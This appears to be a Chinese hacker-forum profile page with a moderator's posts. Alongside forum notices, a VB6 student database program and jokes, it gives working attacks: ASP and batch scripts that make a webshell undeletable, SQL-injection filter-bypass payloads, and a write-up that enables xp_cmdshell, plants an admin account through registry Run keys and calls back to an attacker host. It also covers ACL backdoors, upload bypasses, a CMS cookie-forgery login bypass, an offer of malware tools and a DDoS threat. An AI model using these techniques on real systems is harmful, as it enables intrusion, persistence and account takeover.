风〓阿呆
风〓阿呆
关注数: 0
粉丝数: 105
发帖数: 1,556
关注贴吧数: 1
对于 webshell内文件无限恢复的应付方法 情况是这样,webshell(仅仅是webshell)下有个文件无法删除,无法修改,通过attributes 去除属性后再删除,但瞬间“满血满状态,原地复活了“ 貌似以前就遇到过这种情况,当初还跟knell讨论过,一致认为是服务器下有个文件 通过 requst 截取某些参数,然后通过Server.CreateObject("Scripting.FileSystemObject") 来创建这个“无法删除的”文件,接着Attributes设置权限,然后通过外部服务器不断的get,post发包,来让这个文件无限的复活- - 对此,我写了个脚本,经测试,完美阻止这种恶心的攻击方式 Poc.1: ____________________________________________________________________________ Function DelAttrib(TheFile) 'thefile为要修改的文件,大家最好自己写个from表单 response.write "Loading...:"&TheFile&" ...<br>" set fs=Server.CreateObject("Scripting.FileSystemObject") IF fs.FileExists("\\.\"&TheFile) then set f=fs.GetFile("\\.\"&TheFile) f.Attributes=0 '设置属性 set f=nothing response.write "Less Success!" '成功后的提示 if Right(TheFile,1)="\" or Right(TheFile,1)="/" or Left(Right(TheFile,4),1)<>"." then Call fs.DeleteFolder(EE,true)'删除文件 response.write "Delete Success!" else IF fs.FileExists("\\.\"&TheFile) then FN=LCase(Mid(TheFile,InStrRev(Replace(TheFile,"\","/"),"/")+1)) if Instr(FN,"com")<1 and Instr(FN,"con")<1 and Instr(FN,"aux")<1 and Instr(FN,"prn")<1 and Instr(FN,"nul")<1 then set f=fs.GetFile("\\.\"&TheFile)‘ f.Attributes=0 set f=nothing end if fs.Deletefile("\\.\"&TheFile) ‘基于windows保留字命名文件的删除模式 response.write "Delete Success" else response.write "Open File Fail!" '错误提示 end if end if else response.write "Open File Fail!" END IF Dim CMDShell,StrExec,ExecName set CMDShell=Server.CreateObject("WScript.Shell") '调用wscript执行Poc.2的bat脚本 StrExec="D:\web\cmd.exe /c" '这里为自定义的cmd文件 ExecName="D:\web\jfcx\include\a.bat" '这里为上传到服务器的bat脚本 CMDShell.exec(StrExec&" "&ExecName).stdout.readall set fs=nothing End Function _____________________________________________________________________________ Poc.2: ———————————————————————————————————————————— copy d:\web\a.asp \\.\d:\web\b.asp&&attrib \\.\d:\web\b.asp +a +r +s +h&&cacls \\.\d:\web\b.asp /e /d IUSR_WSPC-HVJ5FRCT79&&cacls \\.\d:\web\b.asp /e /g IUSR_WSPC-HVJ5FRCT79:r&&cacls \\.\d:\web\b.asp /e /d users&&cacls \\.\d:\web\b.asp /e /g users:r&&cacls \\.\d:\web\b.asp /e /d system&&cacls \\.\d:\web\b.asp /e /d administrators 此处脚本存为bat,d:\web\a.asp 是自己创建的文件路径 d:\web\b.asp 是自动恢复的文件路径 ,各服务器iis用户组有所不同,请自行修改 ————————————————————————————————————————————
sql新型注入&绕过方式 原文 http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fhi.baidu.com%2Fwtvv%2Fblog%2Fitem%2F5c12e4cda8c62e5d0eb34520.html&urlrefer=88fee6a94ce1126bdddbe96fca0aa617 自sql注入发展至今,许多安全文章似乎扭曲了不少人的注射思维,传统的检测注射方法是通过: and 1=1 , and 1=2 来判断真假从而判断是否过滤完全,当然,也有 or 1=2,or 1=1,或者 在数值注射 例如:id=1+1 或id=2-1,等等 本文的目的不是评判谁的检测方法实用,只是向大家推荐一些新的注射方式,可能早有人提及了:) 注:主要针对php下的mysql注射,可借鉴,就不一一介绍了 首先说判断: Null值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null 或: and 2<=3 其实,很多人习惯性的用=号来判断了,但是,如: >= ,<= ,is null,is not null,<>等 都可用于判断 接着说注入 对于注射取值,我们熟悉的就是union select 和 blind sqlinjection(盲注) 先说Union Select 对于常规的注射,我们可以union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4 Ok,看我演示, id=1+u/**/nio/**/n+se/**/lect+1&id=2,3&id=4 够恶心吧?可绕过国内所有防注射哦:) 这代码运行后效果如上,至于原理我希望大家自己去查查相关资料,有异议的可给我留言 当然,在语句传递多个参数时 例如 slect * from table where id = 1 and name = xxx ,我们可这么做: id=1+union/*&name=*/select+1,2 代入查询后 slect * from table where id = 1 union /* and name = xxx */ select 1,2 这是一种让常量(变量)失效的技巧,当然,环境要求比较苛刻 :) 下面说说Blind SqlIjection(盲注): 一般方式,我想大家应该是这么做的: ascii(substring(password,1,1))=56,或者是 ord(mid(password,1,1))=56 在此,我推荐大家还是用子查询,当然,前提是猜出表,字段,可更为准确的得到想得到的数据 此前,仍然向大家推荐一些新型的手法: find_in_set 例: find_in_set('56',ascii(substr(password,1,1)))=1 strcmp 例: strcmp(left('password',1), 0x56) = 1 将这些函数套如子查询就是: id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x55)=1 false id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x56)=0 true id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x57)=-1 false 不明白原理的请查阅函数手册或给我留言
小吧们请负责
人气不错 ~ 加油哦 ! 以后会常来逛逛
〓公告〓为了打击广告刷吧.黑客吧管理组将实行严厉的规定. 从现在开始,严格禁止发广告贴、收徒、拜师、业务,一旦发现一次,直接封IP封ID。没有人情可讲。有意见的爱到哪投诉去哪投诉。-------黑客吧管理组
黑吧重新整顿,面对广大黑友 〓招聘小吧〓 要求: 充足的上网时间,每天固定时间在吧内活动,提高吧内人气,有一定的网络技术基础! 对自己有信心的请跟贴~ 考核时间为1星期
SA下的艰苦渗透! 好久没写渗透文章了,今天无聊随便写点,看得懂的来一起讨论讨论```` 应客户要求!对一站点进行渗透测试 www.xxx.com (原地址隐藏) 不废话,直接进主题``` 站点套用的.net 脚本! 服务器为Windows 2003 iis 6.0 google site: www.xxx.com inurl:aspx 发现注射点~ articleinfosSubject.aspx?ID=609 啊D检测!发现信息显示数据库为ACC 我笑 ~ 这么个大的站点 还是.net 用的acc? 丢NBSI里,返回信息为SA 登陆用户为SA 见鬼,同样的注射不同的结果,后来才看到,原来关闭了错误回显``` 直接提交 and (SElect count(*) from sysobjects)>0-- 正常 and (SElect count(*) from msysobjects)>0-- 异常 这里 对SQL注射熟悉的人 可以看出我的注射语句有点不正常,这个稍后说明 说明是SQL数据库咯,看下权限~ ;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- 正常, 看来是SA咯! 可惜关闭了错误提示,只能手工了,不过可是SA哦~ 继续提交;exec master.dbo.xp_cmdshell 'net user guest /active:yes'-- 很好,问题来了! hackers : Please do not try to inject attack site, the site has implemented safety control, lawless elements will crack down! Keep your system has been operational records law: IP operation:58.54.XXX.XXX Time:2008-03-31 16:02:35 Page:http://www.XXX.com/articleinfosSubject.aspx?ID=609;exec master.dbo.xp_cmdshell 'net user guest /active:yes'-- Sumbit Type:GET Parameters:ID Data:609;exec master.dbo.xp_cmdshell 'net user guest /active:yes'-- 被LOG记录了,记录得很详细嘛,可是,是哪过滤了呢? 试着提交了其他的注射语句,同样的被记录了! 直到提交 EXEC master.dbo.xp_cmdshell 'net user guest /active:yes'-- OK,终于返回错误信息了,汗 看来过滤了大小写!(这也就是上面我判断数据库时为什么要用SElect了) 不过,问题解决了,新问题又来了,xp_cmdshell 无法执行,被禁了? 提交 ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE-- 很好,返回正常,看来恢复成功了``` 接着试着 执行 EXEC master.dbo.xp_cmdshell 'net user guest /active:yes'-- 仍然报错,看来真是RP问题了! 试了oacreate 也是报错 继续提交: EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','xwq1','REG_SZ','C:\windows\system32\cmd.exe /c net user wooden 123123 /add' 返回正常, 还好,还有xp_regwrite 可以用,继续提交 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','xwq1','REG_SZ','C:\windows\system32\cmd.exe /c net localgroup administrators wooden /add' OK,成功在RUN里写了个提权帐号 既然regwrite 可以用,那么试下开启sandboxmode EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0-- OK 成功执行,接着 Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','Select shell("net user wooden 123123 /add")'); 报错,看来是没戏了,不过,还好顺利执行了xp_regwrite 接着就是判断WEB与DATA是否分离了! 本地监听了个端口 接着在注射点上执行 select * from OPENROWSET('SQLOLEDB', 'uid=hook;pwd=hook;Network=DBMSSOCN;Address=121.XX.XX.XX,XX。;', 'select * from xx') 顺利的地到了DATA IP 到此,检测已经完成``` 其实这次入侵的确花了好多心思的,我只是把入侵过程缩减了很多。。。 服务器其实还过滤了单引号,不过通过 declare @a sysname select @a= exec master.dbo.xp_cmdshell @a 变量声明后 顺利的执行了语句!
节日到了,祝大家节日快乐
重新申请大吧! 天使批准先~ 下面是对管理员说的: “尊敬“的管理员同志,不晓得这次又是谁在投诉我了,的确,我有半个月没登陆过ID,但是,一个帖吧的正常运作,不是光靠吧主登登ID就可以了,你是否了解,我们有自己的黑吧会议群?你是否又明白,一个管理者,不是亲历亲为就可以的了,再问:为什么你们又要分配小吧?最后:黑客吧是否没落了呢? 请问:你是要名能够带领帖吧成员,发挥团队实力来管理帖吧的大吧 ,还是要名,整天登个ID在那删帖的大吧? 另外,对于我半个月没登ID 向吧友道个歉,to friend is not you
由继承权限联想到的Backdoor 昨天在扫描的时候,为了不让卡巴把我的hack包给Del了,直接把hack文件夹的权限给禁了... 今天在解压个文件的时候,竟然拒绝访问,这才想起到昨天禁用权限的时候这个文件继承了昨天的设置...不禁联想到,是否能依靠继承权限来留个backdoor呢? 我们都知道,在Windows默认的设置中,子目录是继承了父目录的权限的,不仅在磁盘,在各个领域中,几乎都是默认的,简单的说,Webshell就是继承了IIS,而IIS又是继承了System... 那么,我们是否可以利用管理员的这种心理,来给我们留个后门呢?当然,系统后门估计是不行,那我们就留个Webshell's door 吧 假设,我现在已经取得了一台服务器的控制权,我在他的web深目录下建个adai文件夹,然后在里面写个个一句话木马,OK```接着,我们回到web目录所继承权限的磁盘目录,把原有控制磁盘权限的帐户全部del,然后重新建立原有的帐户,并为他们分配好原有的权限,这样,子文件及文件夹失去了对父文件的继承了... 接着我们在DOS下回到web深目录,执行: Cacls adai /t /e /c /g administrator Cacls adai /t /e /c /g guest Cacls adai /t /e /c /g system 这样,是把此文件夹已经继承此文件夹下的子文件及子文件夹的系统帐号权限删除... 接着运行attrib +r +s +h adai 这样是否更加完美了? 这只是个初期想法,比较适合菜鸟网管吧... By:阿呆
〓公告〓关于小吧的待遇!! 黑客吧从建吧开始,就涌现了不少热情的吧民,为黑吧发展打下了很好的基础,自从百度特设小吧管理组后,咱黑客吧涌现出的小吧主,各个都十分卖力!!! 我本人也十分感谢他们... 如果没有这些小吧,单靠几个大吧是很难管理的。。。 目前本吧,有小吧如下:风之末端 再去抗战二十年 赵霆俊 杨颜骏 _丰_ 穿鞋走过地狱 老づ鬼 ghosTM55 这些就是本吧的管理组~他们有新来的,长老级的...无论如何,他们都在为本吧尽力尽力!! 为了感谢这些小吧,我决定,从今天开始,本吧的所有小吧们都可以免费领取我发放的一些内部工具,没啥好东西,当是一种鼓励吧!! 嘿嘿,其实我也没啥好东西~ 1.通杀所有邮件ODAY 2.感染传播免杀下载者 3.内部ARP生成器 4.功能全面asp后门 5.内部兔子,阿呆踩点工具包 6.BBST注册版 7.免杀vbs,ftp远程下载脚本 就这点东西了,嘿嘿,俺的确没ODAY可以给的- - 工具永远只是省力!!!原理才是关键~~~ 需要的小吧在会议群里喊我~~ 限每人只能领取两样~(俺拿点小东西不容易>_<..),不得交易,外泄!!!(要是被我知道了,你们有生命危险)
不知道有没人遇到过这种病毒!! 今天无故中的,估计是指定时间运行的!! U盘传播,局域网ARP,IPC传播...感染exe,dll,autorun.ini,病毒分散各系统文件,大概12个!!!只要感染其中一个,其他全中....DLL注入svchost和封装rundll... 改卡巴日期时间,而且是5秒改一次...各小马都有连接,一中全中... 改IE注册表并锁死...篡改了不少注册表(可没把我累死) 本以为删了所有小马就够了,谁知道封装了dll和pf在系统进程里,找了足足2小时,写了N个批处理,还翻了不少资料...哎~手杀真的很累,杀软根本没用...本想还原的..结果把我的gho文件也删了...很TM晦气,中了这么个变态....估计是个新变种,大家以后自己小心点!!! 可能是个下载者,带各种游戏的盗号木马和鸽子变种
斑竹的生活(小美女贴图版),好可爱啊!!! 每天..斑竹都坐在电脑前面..连泡咖啡都是匆匆忙忙的
黑客吧原创之站点入侵篇 (技巧篇) 废话就不多说了,我给大家说下在入侵时运用的技巧。 1.建议大家多使用googlehack. 2.2003的域名解析漏洞大家不陌生吧,曾经把动易搞得人人自危,其实不光是动易,现在很多门户站都可以利用,在注册时注册个***.asp的用户,然后在个人属性中就可以上传图片木马了. 3.上传,这个我以前说过,在上传时,遇到无法上传图片时可以试下asa (后面有空格),cer只类的,或者查看源代码,看是否有调用javascript只类的验证,将其删除保存至本地提交。(这个方法对2点注册的时候也有效),或者采用gif89a欺骗,就是在木马图片的第一行上写插入这个 4.对于搞不定的站点,找同网段下的站点然后ARP 5.别小看XSS,如果能运用的好,绝对是最棒的入侵方法! 6.多看源代码,如果发现有限制的script脚本,立即删除,本地提交。 7.多抓包,了解网站大概的数据流 8.搜索型注射也是一个很不错的方法。。。(前提是,你得遇到) 就说这么多了,我该去休息了 BY:阿呆
〓帖吧公告〓进者必看,对于学习有好处的!!!
〓申诉〓关于黑客吧吧主 赵霆俊 被封一事,请管理员进来下! 管理员你好,我是黑客吧的吧主风〓阿呆... 事情的经过,相信管理员已经清楚了,对此,我代表赵霆俊及黑客吧对这次事件造成的影响深感歉意! 目前,我们跟跑跑吧已经和解了,还好事情闹的不是太大...我们也及时制止了... 在此,我向管理员说明下事情的经过,我知道你们在事发时接到了很多投诉,但不能因为一面之词就断定错在黑客吧及赵霆俊身上... 的确,我承认当初我们的人言辞偏激,但我们吧里的人都不会做出放毒,爆吧如此过激的行为,我相信,当初绝对是那些“无聊人士”为了制造争端才这么做的...而且,赵霆俊本人在发现事情的严重性后也及时做了相对应的补救措施!!! 虽然这次时间的确是他引发的,但人非圣贤,孰能无过呢,所以,我希望管理员能恢复其权限....
关于黑客吧吧主 赵霆俊 被封一事,请管理员进来下! 管理员你好,我是黑客吧的吧主风〓阿呆... 事情的经过,相信管理员已经清楚了,对此,我代表赵霆俊及黑客吧对这次事件造成的影响深感歉意! 目前,我们跟跑跑吧已经和解了,还好事情闹的不是太大...我们也及时制止了... 在此,我向管理员说明下事情的经过,我知道你们在事发时接到了很多投诉,但不能因为一面之词就断定错在黑客吧及赵霆俊身上... 的确,我承认当初我们的人言辞偏激,但我们吧里的人都不会做出放毒,爆吧如此过激的行为,我相信,当初绝对是那些“无聊人士”为了制造争端才这么做的...而且,赵霆俊本人在发现事情的严重性后也及时做了相对应的补救措施!!! 虽然这次时间的确是他引发的,但人非圣贤,孰能无过呢,所以,我希望管理员能恢复其权限....
〓公告〓对于最近发生的“跑跑冲突”一事,大家都来看看! 事情已经发生了,双方吧主都已经被撤消了,大家觉得还有必要再去发生任何冲突么? 我已经跟跑跑吧的吧主谈好了,事情到此结束!!!我也希望吧友们不要再去跑跑吧挑衅.... 这件事没有绝对的对或错,所以大家也不要去追究什么了。 在此我要强调下:在冲突期间,有一批吧友到跑跑去放毒...请大家明白:黑客吧的含义和精神,这是种极其卑鄙的手段...我希望放毒的朋友能自我反省下,其次,暴吧,这就更不用说了,暴吧,有意义么?多的我不想说了,大家都要反省,不仅是黑客吧还是跑跑吧。。。 既然事情已经过去了,我希望大家要向前看... 这里我声明几点: 1.我希望大家都不要在去跑跑吧挑衅了,无意义的. 2.现在老赵已经被撤消了,我希望大家团结一致,到吧友吧向百度管理员说清楚...希望能给他次机会!!! 3.对于来本吧挑衅的人,我劝告他,别以为我们怕了你..对于你们这种白吃行为,我们不削,只有白吃才会同白吃争辩,人,又怎么能跟动物沟通呢 4.一旦被我发现还有谁无无理取闹的,永久禁ID,别以为换IP我就拿你没办法了,DDOS不是干看的!! 话我已经说了,这件事就到此为止.... By:阿呆
请跑跑吧吧主进来下,我是黑客吧吧主 由于我最近5.1放假,吧里发生了很多事都不了解,其中最大的恐怕就是与贵吧的冲突了,我想和跑跑吧吧主说说,希望你们能给我消息..Q262051149
〓黑客吧:吧友求识专帖〓 请各吧友将需要的教程跟帖发表,届时会有各吧主为大家量身定做!!!! PS:此为吧友求识专帖,勿灌水...
〓活动〓吧友求识区---在这里,你将学到黑客点滴... 为了让各吧友们能更积极的投入到学习中,也为了黑客吧更好的发展,经过各管理组商讨决定:黑客吧将不定期发表各吧主的原创教程,教程内容都是各吧主们精心为菜鸟们准备的...届时请广大菜鸟关注,凡是教程前标有:黑客吧原创的教程帖,就是为吧友准备的... 为了带动吧友的学习积极性,管理组决定,将由吧主们带动为广大吧友讲解黑客知识,具体事宜,参考如下: 1.吧友们可根据自身需求,在下面的〓吧友求识〓帖中发表自己需要的教程,届时,会有各吧主为吧友制作教程... 2.所求教程不得是:QQ相关,盗号相关,刷卡相关等等... 3.希望大家体谅管理组的辛苦,能自己找到答案的就别麻烦众吧主 4.教程发表后会在教程前加上 应吧友要求 字样,请自行关注 本活动最终解释权归黑客吧所有... 请大家积极参与活动,学习Hack知识... 活动相关地址稍后公布... By:阿呆
〓黑客吧〓公告,进吧必看!
给大家拜年了! Happy New Year 猪年快乐 祝红客吧越办越好!!!
欢迎大家常来黑客吧玩 http://post.baidu.com/f?ct=&tn=&rn=&pn=&lm=&sc=&kw=%BA%DA%BF%CD&rs2=0&myselectvalue=1&word=%BA%DA%BF%CD&tb=on
前段时间写的学生数据库管理系统 编译环境:VB6.0 只发代码,控件就不发了:登陆框:Private Sub Command1_Click()Dim a As StringDim b As Stringa = Text1.Textb = Text2.TextIf a = "adai" And b = "123" Thenj = MsgBox("欢迎您登陆!但您不能查看您的信息和成绩!", , "同学")管理.ShowUnload Mebuttons FalseElseIf Combo1.Text = "老师" And a = "laoshi" And b = "123" Theni = MsgBox("欢迎您登陆!您可以修改任何成绩和信息!", , "老师")管理.ShowUnload Mebuttons TrueElse: q = MsgBox("帐号或密码错误,请重新输入!", , "错误")Text1.Text = ""Text2.Text = ""Text1.SetFocusCombo1.Text = ""End IfEnd SubPrivate Sub buttons(val As Boolean)管理.cjgl.Enabled = valEnd Sub成绩管理框:先用”菜单编辑器”制作如下菜单重新登陆 学生信息查看通用 成绩管理 帮助 (关于) 退出 学生成绩查看分别为他们赋予名称:ty(dl)(tc),cjgl(xxck)(cjck),bz(gy)相关代码如下:Private Sub cjck_Click()成绩浏览.ShowEnd SubPrivate Sub dl_Click()Dim a As Integera = MsgBox("确定要重新登陆么?", 1 + 32, "提示")If a = 1 ThenUnload Me登陆.ShowEnd IfEnd SubPrivate Sub gy_Click()关于.ShowEnd SubPrivate Sub MDIForm_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd SubPrivate Sub tc_Click()Dim a As Integera = MsgBox("确定要退出么?", 1 + 32, "提示")If a = 1 ThenUnload MeEnd IfEnd SubPrivate Sub xxck_Click()信息浏览.ShowEnd Sub版权框:控件名属性参数frame1caption帮助信息backcolor&H00C0E0FF&Label1backcolor&H00C0E0FF&caption学生数据库管理系统 测试版 V1.0font楷体Label2backcolor&H00C0E0FF&captionPower By 阿呆Label3backcolor&H00C0E0FF&caption此程序可实现数据库系统的管理,和安装调试,由于制作的比较匆忙,程序本身肯定是不够完善的,如发现bug,请及时通知作者,欢迎您使用本软件,谢谢!!Image1PictureCommand1caption退出相关代码:Private Sub Command1_Click()Unload MeEnd SubPrivate Sub Form_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd Sub信息浏览:首先创建一个数据库(cjgl),为其建立两个表:xsxx和xscj。Xsxx包含字段名:学号,姓名,性别,班级,生日,地址Xscj包含字段名:学号,姓名,班级,语文,数学,英语,专业在控件Ado中设计其属性,使其指定数据库cjgk的xsxx表,相关控件如下Adodc1RecordSourcexsxxDataGrid1allowdelecttrueallowaddnewtruedataSourceAdodc1代码如下:Private Sub Adodc1_WillMove(ByVal adReason As ADODB.EventReasonEnum, adStatus As ADODB.EventStatusEnum, ByVal pRecordset As ADODB.Recordset)End SubPrivate Sub Form_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd Sub成绩浏览在控件Ado中设计其属性,使其指定数据库cjgk的xscj表,相关控件如下:Command1caption添加Command2caption删除Command3caption保存Command4Caption退出DataGrid1dataSourceAdodc1代码如下:Private Sub Command1_Click()Adodc1.Recordset.AddNewEnd SubPrivate Sub Command2_Click()Adodc1.Recordset.DeleteEnd SubPrivate Sub Command3_Click()Adodc1.Recordset.SaveEnd SubPrivate Sub Command4_Click()Unload MeEnd SubPrivate Sub Form_queryunload(cancel As Integer, unloadmode As Integer)If MsgBox("您确定要退出此程序么?", vbQuestion + vbYesNo, "提示") = vbNo Thencancel = TrueEnd IfEnd Sub感觉效果还不是很好,有空改进下~~嘿嘿..
转篇以前写的文章,新云小漏洞! 最近玩新云时,在COOKIE欺骗的时候,经常会遇到已经有管理员在线,不允许多用户同时登陆,导致进不了后台,拿不了webshell,很是郁闷,下了新云的源码回来看了下。在admin_login.asp文件里发现了个小问题,一起来看看(由于小弟ASP算不上入门,仅简单分析下,出错了别拿番茄炸我): Sub logout() '清除COOKIES中管理员身份的验证信息. Session.Abandon Session("AdminName") = "" Session("AdminPass") = "" Session("AdminGrade") = "" Session("AdminFlag") = "" Session("AdminStatus") = "" Session("AdminID") = "" Session("AdminRandomCode") = "" Response.Cookies(Admin_Cookies_Name) = "" Response.Redirect ("../") End Sub 这里可以到,我们COOKIE提交的时候主要是提交AdminName,AdminPass,AdminGrade,AdminFlag,AdminStatus,AdminID,AdminRandomCode这几个参数,RandomCode是随机码,也就是登陆时验证管理员是否在线的参数。 Sub chklogin() Dim adminname, password,RandomCode adminname = Trim(Replace(Request("adminname"), "'", "")) password = md5(Trim(Replace(Request("password"), "'", ""))) If Newasp.CheckPost = False Then ErrMsg = ErrMsg + "您提交的数据不合法,请不要从外部提交登陆。" Founderr = True End If If Newasp.IsValidStr(Request("adminname")) = False Then ErrMsg = ErrMsg + "" Founderr = True End If If Newasp.IsValidPassword(Request("password")) = False Then ErrMsg = ErrMsg + "" Founderr = True End If If Request("verifycode") = "" Then ErrMsg = ErrMsg + " " + "" Founderr = True ElseIf Session("getcode") = "9999" Then Session("getcode") = "" ErrMsg = ErrMsg + " " + "" Founderr = True ElseIf CStr(Session("getcode"))<>CStr(Trim(Request("verifycode"))) Then ErrMsg = ErrMsg + " " + "" Founderr = True End If Session("getcode") = "" If adminname = "" Or password = "" Then Founderr = True ErrMsg = ErrMsg + " " + "" Exit Sub End If If Founderr = True Then Exit Sub If Not IsObject(Conn) Then ConnectionDatabase Set Rs = Server.CreateObject("ADODB.Recordset") SQL = "select * from NC_Admin where password='" & password & "' And username='" & adminname & "'" Rs.Open SQL, Conn, 1, 3 If Rs.BOF And Rs.EOF Then FoundErr = True ErrMsg = ErrMsg + "" Exit Sub Else If password <> Rs("password") Then FoundErr = True ErrMsg = ErrMsg + " " Exit Sub End If If Rs("isLock") <> 0 Or Rs("isLock") = "" Then Founderr = True ErrMsg = "" Exit Sub End If End If 这里定义了三个变量adminname, password,RandomCode 可以看到,从事件开始到结束都没有对RandomCode变量进行判断。 接着看到: RandomCode = Newasp.GetRandomCode Rs("LoginTime") = Now() Rs("Loginip") = Newasp.GetUserip 可以看到RandomCode变量是直接从数据库中提取赋值的。 也就是说,RandomCode存在于数据库中,并且程序对这个变量(随即码)没有进行任何判断。 实际运用: 我们在制造注入猜解的时候,在猜字段username,password,id时可以加猜一个RandomCode字段进行猜解,然后在提交的COOKIE中找到RandomCode把我们猜解出来的数据替换原来的 例: ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=9f7fa2c6858e1e77&RandomCode=(这里填写RandomCode值)&AdminName=admin 这样在提交时 不论管理员是否在线都可以直接登陆后台。
新年快乐~ 给大家拜年了 happy new year
进程中的rundll32.exe解释 今天在一个群里听到一些朋友怀疑自己是否中毒,截了个rundll32.exe的进程给我看,考虑到很多菜鸟朋友可能也经常碰到这种情况,老怀疑是病毒,所以我给大家稍微讲解下rundll32。 rundll32,有点英语基础都知道:运行32位的dll文件,为什么是32位呢?因为现在2000/XP的都是32的,只有比较老的95/98才有16位的,也就是rundll,或rundll32(因为98中也有采用32位的)。 而这些rundll32实际上是系统本身的文件,它是用来加载一些dll文件的。 但是,现在的木马可以更改进程名,一些聪明的hack就会想到用rundll32来假冒系统进程。那么要如何区别他是否是病毒呢,我给大家一点我的心得: 一般,进程里有那么一两个就不要太担心了,但是过多的话,就得注意了,如果还会拖CPU那就肯定是了,可以用一些进程查看软件看看rundll32是从哪启动的,一般在系统目录下(winnt/windows)的system或system\dllche目录下的就没什么问题了。 就说到这里吧... By:阿呆
想申请小吧主的进(实行破格录取制度) 首先我要说明:小吧主只是一名管理者,要为黑客吧做为贡献,能及时的清理帖子和回答问题。 申请格式: ID: 年龄: 技术功底: 联系方式(QQ/Email): 对帖吧看法: 请按如上格式申请小吧主,申请完后并不是马上成为小吧主,各小吧主和吧主还要对其进行考核和验证,以及在吧内的表现,时间3天,除各小吧主和吧主外,其他人勿灌水!!! 关于破格录取,由吧主考核,考核通过后,正式成为小吧主,先回答几个问题: 你为什么要当小吧主? 你认为黑客吧内的文章技术性如何? 你认为黑客吧的存在意思是? 你精通什么?C?VB?JAVA?ASP?... 做个题目吧: create database wind; create table adai; insert into adai (admin,pass,id,ip,qq,level)values('admin','pass','1','220.221.211.201','2222222','7'); 写个语句把密码给我?帐号呢?QQ呢?... 如果想破格录取的朋友请按上面格式跟帖,做题目时只要回答一个就够了,比如密码,或者帐号,或者QQ,都可以,不得出现答案相同的情况! By:阿呆
黑客吧技术交流
让管理员头疼的ID (爆笑) 转载 1.取名“不认识” 举报人:“管理员,我举报” 管理员:“谁?” 举报人:“不认识” 管理员:“……滚……” 2.取名“请等等” 举报人:“管理员,我举报” 管理员:“谁?” 举报人:“请等等” 管理员:“好的,快点!” 一分钟后…… 管理员:“到底是谁?” 举报人:“请等等啊!!!” 管理员:“等你个头啊,滚…… ” 3.取名:“就是我” 举报人:“我举报!!!” 管理员:“谁?” 举报人:“就是我” 管理员:“很好,成全你……封!” 举报人:“……救命啊……” 4.取名:“骗你的” 举报人:“管理员 我举报” 管理员:“又举报?谁?” 举报人:“骗你的” 管理员:“吃饱了没事干回家喝奶去,滚!” 5.取名“嘿嘿嘿嘿” 举报人:“管理员,有人用外挂,我举报” 管理员:“好的,是谁?” 举报人:“嘿嘿嘿嘿” 管理员:“……请问是谁?” 举报人:“嘿嘿嘿嘿” 管理员:“来人啊,拨打神经病医院电话……” 6.取名“我是你爸” 举报人:“管理员,有人用外挂” 管理员:“谁?” 举报人:“我是你爸” 管理员:“我是你爷爷!” 7.取名“不是我” 举报人:“我举报,有人用外挂” 管理员:“……,谁?” 举报人:“不是我” 管理员:“???那是谁?” 举报人:“就不是我” 管理员:“你TM废话,不是你是谁?” 举报人:举报人:“真的,不是我呀” 管理员:“滚……” 8.取名“管理员啊” 举报人:“管理员哥哥,有人用外挂,我举报” 管理员:“好的,是谁?” 举报人:是“管理员啊” 管理员:“谁?你说谁?” 举报人:“管理员啊” 管理员:“……,我有必要用外挂吗?灭了你!……。” 9.取名:“本人已死” 举报人:“管理员,有人外挂,我举报” 管理员:“****小子我被玩了一天了, 敢报假案的话,俺宰了你,快说是谁?” 举报人:“本人已死” 管理员:“你……,死了闹什么闹,活了再来找我。” 10.取名:打死我也不说 举报人:“管理员 我举报” 管理员:“又举报?谁?” 举报人:“打死我也不说” 管理员:“……!吃饱了没事干,滚……!”
